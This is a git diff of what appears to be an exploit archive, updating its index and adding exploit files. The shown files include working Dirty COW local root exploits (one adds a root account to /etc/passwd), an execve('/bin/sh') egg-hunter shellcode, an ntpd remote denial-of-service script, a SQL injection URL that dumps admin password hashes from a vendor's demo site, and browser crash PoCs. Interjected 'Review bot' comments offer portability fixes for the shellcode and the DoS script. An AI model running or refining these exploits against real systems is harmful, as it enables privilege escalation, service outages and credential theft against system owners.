-34212,platforms/php/webapps/34212.html,"OneCMS 2.6.1 - admin/admin.php Short1 Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0
+34210,platforms/php/webapps/34210.txt,"OneCMS 2.6.1 - 'cat' Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0
+34211,platforms/php/webapps/34211.html,"OneCMS 2.6.1 - 'search' Parameter SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps,0
+34212,platforms/php/webapps/34212.html,"OneCMS 2.6.1 - 'short1' Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0
 34213,platforms/php/webapps/34213.txt,"PHP Bible Search - bible.php chapter Parameter SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps,0
 34214,platforms/php/webapps/34214.txt,"PHP Bible Search - bible.php chapter Parameter Cross-Site Scripting",2010-06-29,"L0rd CrusAd3r",php,webapps,0
 34215,platforms/php/webapps/34215.txt,"MySpace Clone 2010 - SQL Injection / Cross-Site Scripting",2010-06-28,"L0rd CrusAd3r",php,webapps,0
@@ -34117,7 +34130,7 @@ id,file,description,date,author,platform,type,port
 35615,platforms/php/webapps/35615.txt,"PhpAlbum.net 0.4.1-14_fix06 - 'var3' Parameter Remote Command Execution",2011-04-14,"High-Tech Bridge SA",php,webapps,0
 35616,platforms/php/webapps/35616.txt,"Agahi Advertisement CMS 4.0 - 'view_ad.php' SQL Injection",2011-04-15,"Sepehr Security Team",php,webapps,0
 35617,platforms/php/webapps/35617.txt,"Qianbo Enterprise Web Site Management System - 'Keyword' Parameter Cross-Site Scripting",2011-04-14,d3c0der,php,webapps,0
-35618,platforms/php/webapps/35618.txt,"RunCMS 'partners' Module - 'id' Parameter SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0
+35618,platforms/php/webapps/35618.txt,"RunCMS Module Partners - 'id' Parameter SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0
 35619,platforms/php/webapps/35619.txt,"PhoenixCMS 1.7 - Local File Inclusion / SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0
 35621,platforms/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injection",2011-04-16,KedAns-Dz,php,webapps,0
 35623,platforms/multiple/webapps/35623.txt,"Pimcore 3.0 / 2.3.0 CMS - SQL Injection",2014-12-27,Vulnerability-Lab,multiple,webapps,0
@@ -34447,7 +34460,7 @@ id,file,description,date,author,platform,type,port
 36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 - Unrestricted Arbitrary File Upload",2015-02-23,"CWH Underground",php,webapps,80
 36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80
 36157,platforms/php/webapps/36157.rb,"Zabbix 2.0.5 - Cleartext ldap_bind_Password Password Disclosure (Metasploit)",2015-02-23,"Pablo González",php,webapps,80
-36159,platforms/php/webapps/36159.txt,"Zeuscart v.4 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80
+36159,platforms/php/webapps/36159.txt,"Zeuscart 4.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80
 36160,platforms/php/webapps/36160.txt,"phpBugTracker 1.6.0 - Multiple Vulnerabilities",2015-02-23,"Steffen Rösemann",php,webapps,80
 36161,platforms/php/webapps/36161.txt,"WordPress Plugin Easy Social Icons 1.2.2 - Cross-Site Request Forgery",2015-02-23,"Eric Flokstra",php,webapps,80
 36162,platforms/php/webapps/36162.txt,"TWiki 5.0.2 - bin/view/Main/Jump newtopic Parameter Cross-Site Scripting",2011-09-22,"Mesut Timur",php,webapps,0
@@ -36199,7 +36212,7 @@ id,file,description,date,author,platform,type,port
 39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x - Multiple Cross-Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0
 39118,platforms/php/webapps/39118.html,"osCMax 2.5 - Cross-Site Request Forgery",2014-03-17,"TUNISIAN CYBER",php,webapps,0
 39124,platforms/php/webapps/39124.txt,"MeiuPic 2.1.2 - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0
-39126,platforms/php/webapps/39126.txt,"BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0
+39126,platforms/php/webapps/39126.txt,"BigACE 2.7.5 - 'LANGUAGE' Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0
 39127,platforms/cgi/webapps/39127.txt,"innoEDIT - 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0
 39128,platforms/php/webapps/39128.txt,"Jorjweb - 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0
 39129,platforms/php/webapps/39129.txt,"qEngine 4.1.6 / 6.0.0 - 'task.php' Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0
@@ -36817,3 +36830,5 @@ id,file,description,date,author,platform,type,port
 40809,platforms/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,php,webapps,0
 40816,platforms/xml/webapps/40816.txt,"SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML External Entity Injection",2016-11-22,ERPScan,xml,webapps,0
 40826,platforms/php/webapps/40826.py,"Osticket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",php,webapps,0
+40837,platforms/hardware/webapps/40837.txt,"Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting",2016-11-28,Vulnerability-Lab,hardware,webapps,0
+40842,platforms/java/webapps/40842.txt,"Red Hat JBoss EAP - Deserialization of Untrusted Data",2016-11-28,"Mediaservice.net Srl.",java,webapps,8080
diff --git a/platforms/android/remote/40846.html b/platforms/android/remote/40846.html
new file mode 100755
index 000000000..acbe42c9f
--- /dev/null
+++ b/platforms/android/remote/40846.html
@@ -0,0 +1,345 @@
+ + +
+ +
\ No newline at end of file
diff --git a/platforms/hardware/webapps/40837.txt b/platforms/hardware/webapps/40837.txt
new file mode 100755
index 000000000..5143fb714
--- /dev/null
+++ b/platforms/hardware/webapps/40837.txt
@@ -0,0 +1,157 @@
+Document Title:
+===============
+Tenda, Dlink & Tplink TD-W8961ND - DHCP XSS Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=1990
+
+
+Release Date:
+=============
+2016-11-28
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1990
+
+
+Common Vulnerability Scoring System:
+====================================
+3.5
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory research team discovered a persistent xss vulnerability in the Tenda, Dlink & Tplink 1.0.1 TD-W8961ND & ADSL2+ Modem Routers web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2016-11-28: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+Persistent cross site scripting vulnerability has been discovered in Tenda 1.0.1 ADSL Modem Routers.
+The vulnerability allows remote attackers and local privileged account to inject malicious script codes
+on the application-side to manipulate the router dhcp hostnames.
+
+Attackers are able to inject malicious code into the current list of DHCP clients on view, by modifying
+the DHCP hostname into valid xss payload. The execution of vulnerability occurs on the application-side
+on view events. Due to our investigation, we discovered that all models with the firmware v1.x on the
+web gui are affected by the security vulnerability. Remote attackers can for example make special crafted
+malicious pages with POST method requests to manipulate the dhcp hostname listing and client view.
+
+The security risk of the issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
+Exploitation of the vulnerability requires no privilege web-application user account and only low user interaction.
+Successful exploitation of the vulnerability results in phishing attacks, session hijacking, persistent external redirect
+to malicious sources and persistent manipulation of affected or connected web module context.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] DHCP Client List
+[+] DHCP settings
+
+Vulnerable Parameter(s):
+[+] Hostnames
+
+
+Proof of Concept (PoC):
+=======================
+Persistent vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Manaul steps to reproduce the vulnerability ... (local)
+1. Open the Router UI
+2. Login as basic account
+3. Open the DHCP List module via settings
+4. Inject a payload to the hostnames input field
+5. Save the input
+6. Now the list becomes visible with all clients and the payload executes within the context
+7. Successful reproduce of the vulnerability!
+
+The following code is a bash script working on supported Linux OS to change the name of DHCP hostnames to a xss payload.
+Save the file into vulnerablity.sh, then chmod +x vulnerability.sh.
+
+PoC: Exploit
+#!/bin/bash
+GREEN=$(tput setaf 2 && tput bold)
+BLUE=$(tput setaf 6 && tput bold)
+echo $BLUE"[+] Persistent XSS DHCP Exploiter via Routers"
+echo $GREEN"[+] Vulnerability founded by : Lawrence Amer "
+echo -n $BLUE"[~] type XSS Payload here :"
+read -e xss
+echo $xss > /etc/hostname
+echo $GREEN"[+]DHCP HOST NAME IS WRITTEN"
+
+
+Video: https://www.youtube.com/watch?v=HUM5myJWbvc
+
+
+Solution - Fix & Patch:
+=======================
+The xss vulnerability can be patched by a secure parse of the hostnames client parameters.
+Restrict the input and disallow the usage of special chars to prevent the injection point.
+Parse as well the hostnames output location in the active dhcp clients list.
+
+
+Security Risk:
+==============
+The security risk of the persistent xss web vulnerability in the router web-application is estimate as medium. (CVSS 3.5)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Lawrence Amer (https://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer)
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
+
+Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
+of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
+
+ Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+
+
diff --git a/platforms/java/webapps/40842.txt b/platforms/java/webapps/40842.txt
new file mode 100755
index 000000000..719c7305d
--- /dev/null
+++ b/platforms/java/webapps/40842.txt
@@ -0,0 +1,77 @@
+Security Advisory @ Mediaservice.net Srl
+(#05, 23/11/2016) Data Security Division
+
+ Title: Red Hat JBoss EAP deserialization of untrusted data
+ Application: JBoss EAP 5.2.X and prior versions
+ Description: The application server deserializes untrusted data via the
+ JMX Invoker Servlet. This can lead to a DoS via resource
+ exhaustion and potentially remote code execution.
+ Author: Federico Dotta
+ Maurizio Agazzini
+ Vendor Status: Will not fix
+ CVE Candidate: The Common Vulnerabilities and Exposures project has assigned
+ the name CVE-2016-7065 to this issue.
+ References: http://lab.mediaservice.net/advisory/2016-05-jboss.txt
+ http://lab.mediaservice.net/code/jboss_payload.zip
+ https://bugzilla.redhat.com/show_bug.cgi?id=1382534
+
+1. Abstract.
+
+JBoss EAP's JMX Invoker Servlet is exposed by default on port 8080/TCP. The
+communication employs serialized Java objects, encapsulated in HTTP
+requests and responses.
+
+The server deserializes these objects without checking the object type. This
+behavior can be exploited to cause a denial of service and potentially
+execute arbitrary code.
+
+The objects that can cause the DoS are based on known disclosed payloads
+taken from:
+
+- https://gist.github.com/coekie/a27cc406fc9f3dc7a70d
+
+Currently there is no known chain that allows code execution on JBoss EAP,
+however new chains are discovered every day.
+
+2. Example Attack Session.
+
+Submit an authenticated POST request to the JMX Invoker Servlet URL (for
+example: http://localhost:8080/invoker/JMXInvokerServlet) with one of the
+following objects in the body of the request:
+
+ * 01_BigString_limited.ser: it's a string object; the server will
+ reply in a normal way (object size similar to the next one).
+ * 02_SerialDOS_limited.ser: the application server will require
+ about 2 minutes to execute the request with 100% CPU usage.
+ * 03_BigString.ser: it's a string object; the server will
+ reply in a normal way (object size similar to the next one).
+ * 04_SerialDOS.ser: the application server will require an
+ unknown amount of time to execute the request with 100% CPU usage.
+
+3. Affected Platforms.
+
+This vulnerability affects versions 4 and 5 of JBoss EAP.
+
+4. Fix.
+
+Red Hat will not fix the issue because JBoss EAP 4 is out of maintenance
+support and JBoss EAP 5 is close to the end of its maintenance period.
+
+5. Proof Of Concept.
+
+See jboss_payload.zip (40842.zip) and Example Attack Session above.
+
+http://lab.mediaservice.net/code/jboss_payload.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40842.zip
+
+6. Timeline
+
+06/10/2016 - First communication sent to Red Hat Security Response Team
+07/10/2016 - Red Hat Security Response Team response, Bug 1382534
+23/11/2016 - Security Advisory released
+
+Copyright (c) 2016 @ Mediaservice.net Srl. All rights reserved.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40842.zip
diff --git a/platforms/lin_x86/shellcode/40827.c b/platforms/lin_x86/shellcode/40827.c
index 3692ee9f1..dcbf6330f 100755
--- a/platforms/lin_x86/shellcode/40827.c
+++ b/platforms/lin_x86/shellcode/40827.c
@@ -1,45 +1,60 @@ /* -;author: Filippo "zinzloun" Bersani -;date: 25/11/2016 -;version 1.0 -;purpose: different approach with fnstenv technique, changed the usual pattern to find the egg mark +;author: Filippo "zinzloun" Bersani +;date: 28/11/2016 +;version: 1.0 ;X86 Assembly/NASM Syntax -;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit -; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit +;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit +; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit +; Linux bb32 4.4.0-45-generic 32bit + +; description +; egg hunter shellcode: different approach to the classic jpc technique using fstenv and dynamic memory location +; plus a bit of obfuscation to generate the egg mark + +; POC +; execute a shell + +; see comment for details + global _start + section .text + _start: - fldz ;with this 2 instructions... - fnstenv [esp-0xc] ;set the entry point of my egg (_start) +fldpi +fstenv [esp-0xc] ;fstenv getpc: the entry mem addr of this code (_start) +pop esi ;pop it in esi +xor eax,eax +mov al, 0x1f ;set the offset bytes to point at the end of the program +add esi, eax ;set the mem addr dinamically - pop esi ;get the entry point addr... - lea esi,[esi+24] ;the trick: move to pointer @ the last byte of this egg hunter - - mov edx, dword 0x65676760 ;a dumm value.. - rol edx, 0x4 ;...to get the real egg mark: 56767606 +set_mark: + mov edx, dword 0x65676760 ;a dumm value.. + rol edx, 0x4 ;get the real mark: 56767606 find_egg: - inc esi ;scan the next section of memory after this code - cmp [esi], edx ;check if we have found the egg... - jz find_egg ;loop - call esi ;egg found (zero flag is set), jump to the address to exec the shell code - */ - + add esi,4 ;scan the next section of mem, since we are in 32 arch we need to add 4 bytes + cmp[esi], edx ;check if we have found the egg... 
+ jz find_egg ;loop + call esi ;found our egg (zero flag is set), jump to the execution of the shellcode +*/ + #include #include unsigned char egg_hunter[] = \ -"\xd9\xee\xd9\x74\x24\xf4\x5e\x8d\x76\x18\xba\x60\x67\x67\x65\xc1\xc2\x04\x46\x39\x16\x74\xfb\xff\xd6"; +"\xd9\xeb\x9b\xd9\x74\x24\xf4\x5e\x31\xc0\xb0\x1f\x01\xc6\xba\x60\x67\x67\x65\xc1\xc2\x04\x83\xc6\x04\x39\x16\x74\xf9\xff\xd6"; //the actual egg hunter code unsigned char shell_code[] = \ +"\x31\xc0\xb0\x05\xfe\xc0\xfe\xc8\xb0\x06\x90" //dumm instructions "\x06\x76\x76\x56" // egg id reversed -"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; // POC: /bin/bash +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; // /bin/bash main() { printf("Egg hunter length: %d\n", strlen(egg_hunter)); - printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code)); + printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code)); int (*ret)() = (int(*)())egg_hunter; ret(); -} +} \ No newline at end of file diff --git a/platforms/linux/dos/40840.py b/platforms/linux/dos/40840.py new file mode 100755 index 000000000..5151dffb7 --- /dev/null +++ b/platforms/linux/dos/40840.py 
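Review bot: `printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code))` and the egg-hunter-length line above it pass a `size_t` to a `%d` conversion; `%zu` is the correct format, and `main()` relies on implicit `int`, which C99 and later reject, so `int main(void)` is the portable spelling. The new `add esi,4` scan only finds the mark when it sits at a multiple of four bytes past the hunter's last byte, which is what the eleven-byte `//dumm instructions` prefix added to `shell_code` appears to compensate for; that also presumes the compiler lays `shell_code` out directly after `egg_hunter`, so a comment such as `// 11 pad bytes: keeps the mark on the hunter's 4-byte scan stride; assumes the two arrays are contiguous` would record the dependency. The `#include` directives in this hunk show no header names, which looks like an extraction artifact of this rendering rather than the file's content.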
@@ -0,0 +1,26 @@ +#!/usr/bin/env python + +# Exploit Title: ntpd 4.2.8p3 remote DoS +# Date: 2015-10-21 +# Bug Discovery: John D "Doug" Birdwell +# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) +# Website: http://support.ntp.org/bin/view/Main/NtpBug2922 +# Vendor Homepage: http://www.ntp.org/ +# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p3.tar.gz +# Version: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77 +# CVE: CVE-2015-7855 + +import sys +import socket + +if len(sys.argv) != 3: + print "usage: " + sys.argv[0] + " " + sys.exit(-1) + +payload = "\x16\x0a\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa0\x6e\x6f\x6e\x63\x65\x3d\x64\x61\x33\x64\x35\x64\x30\x66\x66\x38\x30\x38\x31\x65\x63\x38\x33\x35\x32\x61\x32\x32\x38\x36\x2c\x20\x66\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39" + +print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..." +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +sock.sendto(payload, (sys.argv[1], int(sys.argv[2]))) +print "[+] Done!" + diff --git a/platforms/linux/local/40838.c b/platforms/linux/local/40838.c new file mode 100755 index 000000000..b7d8379b3 --- /dev/null +++ b/platforms/linux/local/40838.c 
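Review bot: `int(sys.argv[2])` on the `sendto` line is the only validation the port receives, so a non-numeric argument ends in an uncaught `ValueError` instead of the usage message, and the usage string on the `len(sys.argv) != 3` branch reads as `"usage: " + sys.argv[0] + " "` in this rendering, which looks like angle-bracket placeholder text was dropped as markup. The script is Python 2 only (`print` statements, a `str` payload handed to `sendto`) while the shebang is the unversioned `#!/usr/bin/env python`; `#!/usr/bin/env python2` would state the requirement. The first payload byte `\x16` encodes NTP version 2, mode 6 (a control message), so a header comment such as `# mode 6 control packet; peers covered by an ntp.conf "restrict ... noquery" line drop it` would tell an operator which existing hardening already covers this.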
@@ -0,0 +1,72 @@ +// $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball +#include //// pikachu +#include //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball +#include //// pokeball +#include //// (___) +#include //// (o o)_____/ +#include //// @@ ` \ +#include //// \ ____, /miltank +#include //// // // +#include //// ^^ ^^ +#include //// mmap bc757000 +#include //// madvise 0 +////////////////////////////////////////////// ptrace 0 +////////////////////////////////////////////// miltank +////////////////////////////////////////////// +int f ;// file descriptor +void *map ;// memory map +pid_t pid ;// process id +pthread_t pth ;// thread +struct stat st ;// file info +////////////////////////////////////////////// +void *madviseThread(void *arg) {// madvise thread + int i,c=0 ;// counters + for(i=0;i<200000000;i++)//////////////////// loop to 2*10**8 + c+=madvise(map,100,MADV_DONTNEED) ;// race condition + printf("madvise %d\n\n",c) ;// sum of errors + }// /madvise thread +////////////////////////////////////////////// +int main(int argc,char *argv[]) {// entrypoint + if(argc<3)return 1 ;// ./d file contents + printf("%s \n\ + (___) \n\ + (o o)_____/ \n\ + @@ ` \\ \n\ + \\ ____, /%s \n\ + // // \n\ + ^^ ^^ \n\ +", argv[1], argv[2]) ;// dirty cow + f=open(argv[1],O_RDONLY) ;// open read only file + fstat(f,&st) ;// stat the fd + map=mmap(NULL ,// mmap the file + st.st_size+sizeof(long) ,// size is filesize plus padding + PROT_READ ,// read-only + MAP_PRIVATE ,// private mapping for cow + f ,// file descriptor + 0) ;// zero + printf("mmap %lx\n\n",(unsigned long)map);// sum of error code + pid=fork() ;// fork process + if(pid) {// if parent + waitpid(pid,NULL,0) ;// wait for child + int u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length) + for(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l + for(o=0;o +#include +#include +#include +#include +#include +#include +#include +#include +#include 
+#include +#include +#include + +const char *filename = "/etc/passwd"; +const char *backup_filename = "/tmp/passwd.bak"; +const char *salt = "firefart"; + +int f; +void *map; +pid_t pid; +pthread_t pth; +struct stat st; + +struct Userinfo { + char *username; + char *hash; + int user_id; + int group_id; + char *info; + char *home_dir; + char *shell; +}; + +char *generate_password_hash(char *plaintext_pw) { + return crypt(plaintext_pw, salt); +} + +char *generate_passwd_line(struct Userinfo u) { + const char *format = "%s:%s:%d:%d:%s:%s:%s\n"; + int size = snprintf(NULL, 0, format, u.username, u.hash, + u.user_id, u.group_id, u.info, u.home_dir, u.shell); + char *ret = malloc(size + 1); + sprintf(ret, format, u.username, u.hash, u.user_id, + u.group_id, u.info, u.home_dir, u.shell); + return ret; +} + +void *madviseThread(void *arg) { + int i, c = 0; + for(i = 0; i < 200000000; i++) { + c += madvise(map, 100, MADV_DONTNEED); + } + printf("madvise %d\n\n", c); +} + +int copy_file(const char *from, const char *to) { + // check if target file already exists + if(access(to, F_OK) != -1) { + printf("File %s already exists! 
Please delete it and run again\n", + to); + return -1; + } + + char ch; + FILE *source, *target; + + source = fopen(from, "r"); + if(source == NULL) { + return -1; + } + target = fopen(to, "w"); + if(target == NULL) { + fclose(source); + return -1; + } + + while((ch = fgetc(source)) != EOF) { + fputc(ch, target); + } + + printf("%s successfully backed up to %s\n", + from, to); + + fclose(source); + fclose(target); + + return 0; +} + +int main(int argc, char *argv[]) +{ + // backup file + int ret = copy_file(filename, backup_filename); + if (ret != 0) { + exit(ret); + } + + struct Userinfo user; + // set values, change as needed + user.username = "firefart"; + user.user_id = 0; + user.group_id = 0; + user.info = "pwned"; + user.home_dir = "/root"; + user.shell = "/bin/bash"; + + char *plaintext_pw = getpass("Please enter new password: "); + user.hash = generate_password_hash(plaintext_pw); + char *complete_passwd_line = generate_passwd_line(user); + printf("Complete line:\n%s\n", complete_passwd_line); + + f = open(filename, O_RDONLY); + fstat(f, &st); + map = mmap(NULL, + st.st_size + sizeof(long), + PROT_READ, + MAP_PRIVATE, + f, + 0); + printf("mmap: %lx\n",(unsigned long)map); + pid = fork(); + if(pid) { + waitpid(pid, NULL, 0); + int u, i, o, c = 0; + int l=strlen(complete_passwd_line); + for(i = 0; i < 10000/l; i++) { + for(o = 0; o < l; o++) { + for(u = 0; u < 10000; u++) { + c += ptrace(PTRACE_POKETEXT, + pid, + map + o, + *((long*)(complete_passwd_line + o))); + } + } + } + printf("ptrace %d\n",c); + } + else { + pthread_create(&pth, + NULL, + madviseThread, + NULL); + ptrace(PTRACE_TRACEME); + kill(getpid(), SIGSTOP); + pthread_join(pth,NULL); + } + + printf("Done! Check %s to see if the new user was created\n", filename); + printf("You can log in with username %s and password %s.\n\n", + user.username, plaintext_pw); + printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n", + filename, backup_filename); + return 0; +} \ No newline at end of file 
diff --git a/platforms/php/webapps/6927.txt b/platforms/php/webapps/6927.txt deleted file mode 100755 index c59e75b67..000000000 --- a/platforms/php/webapps/6927.txt +++ /dev/null @@ -1,44 +0,0 @@ -############################################################### -#################### Viva IslaM Viva IslaM #################### -## -## Remote SQL injection Vulnerability -## -## AJ ARTICLE ( featured_article.php mode ) -## -############################################################### -############################################################### -## -## AuTh0r : Mr.SQL -## -## H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f -## -## Email : SQL@Hotmail.it -## -## SYRiAN Arab HACkErS -######################## -######################## -## -## Name : AJ ARTICLE -## -## Site : www.ajsquare.com -## -######################## -######################## -## -## -(:: L!VE DEMO ::)- -## -## http://www.ajsquare.com/products/demo/featured_article.php?mode=detail&page=&artid=-109+union+select+0,0,0,0,concat_ws(0x3a,username,admin_password),0,0,0,0,0,0,0+from+admin-- -## -######################## -######################## - - -####################################################################################################### -####################################################################################################### - -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- - - :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS :: -####################################################################################################### -####################################################################################################### - -# milw0rm.com [2008-11-01] diff --git a/platforms/windows/dos/40841.html b/platforms/windows/dos/40841.html new file mode 100755 index 000000000..51de924da --- /dev/null +++ b/platforms/windows/dos/40841.html @@ -0,0 +1,69 @@ + + + + + + + + + + + \ No newline at end of file 
diff --git a/platforms/windows/dos/40843.html b/platforms/windows/dos/40843.html new file mode 100755 index 000000000..ce7927998 --- /dev/null +++ b/platforms/windows/dos/40843.html @@ -0,0 +1,175 @@ + + + + + + + + + + + + + \ No newline at end of file diff --git a/platforms/windows/dos/40844.html b/platforms/windows/dos/40844.html new file mode 100755 index 000000000..ab66f442b --- /dev/null +++ b/platforms/windows/dos/40844.html @@ -0,0 +1,55 @@ + + + + + + + + +Window.xhtml + + + + \ No newline at end of file diff --git a/platforms/windows/dos/40845.txt b/platforms/windows/dos/40845.txt new file mode 100755 index 000000000..bbfcaf50b --- /dev/null +++ b/platforms/windows/dos/40845.txt 
@@ -0,0 +1,65 @@ +Source: http://blog.skylined.nl/20161128001.html + +Synopsis + +A specially crafted web-page can cause a type confusion vulnerability in Microsoft Internet Explorer 8 through to 11. An attacker can cause code to be executed with a stack layout it does not expect, or have code attempt to execute a method of an object using a vftable, when that object does not have a vftable. Successful exploitation can lead to arbitrary code execution. + +Known affected software and attack vectors + +Microsoft Internet Explorer 8, 9, 10 and 11 + +An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path. + +1 Repro.svg: + + + + +1 Target.html: + + + +Description + +In an SVG page, a copy of the has­Feature method of a DOMImplementation object from a HTML page is created. This copy is used as a method of a new object and called with one argument. This can cause at least two issues in the MSHTML!Method_­VARIANTBOOLp_­BSTR_­o0o­VARIANT function of MSIE: + +A Failfast exception when the code detects that calling a method of an object has not cleaned up the stack as expected; this is because the called function appears to expect a different number of arguments or a different calling convention. This issue can be triggered by changing the line o.x(); in the repro to o.x(new Array). +An out-of-bounds write when MSHTML!CBase::Private­Get­Disp­ID is called; this is probably caused by a type confusion bug: the code expects a VARIANT object of one type, but is working on an object of a different type. +The repro was tested on x86 systems and does not reproduce this issue on x64 systems. I did not determine if this is because x64 systems are not affected, or because the repro needs to be modified to work on x64 systems. + +Exploit + +Exploitation was not attempted. 
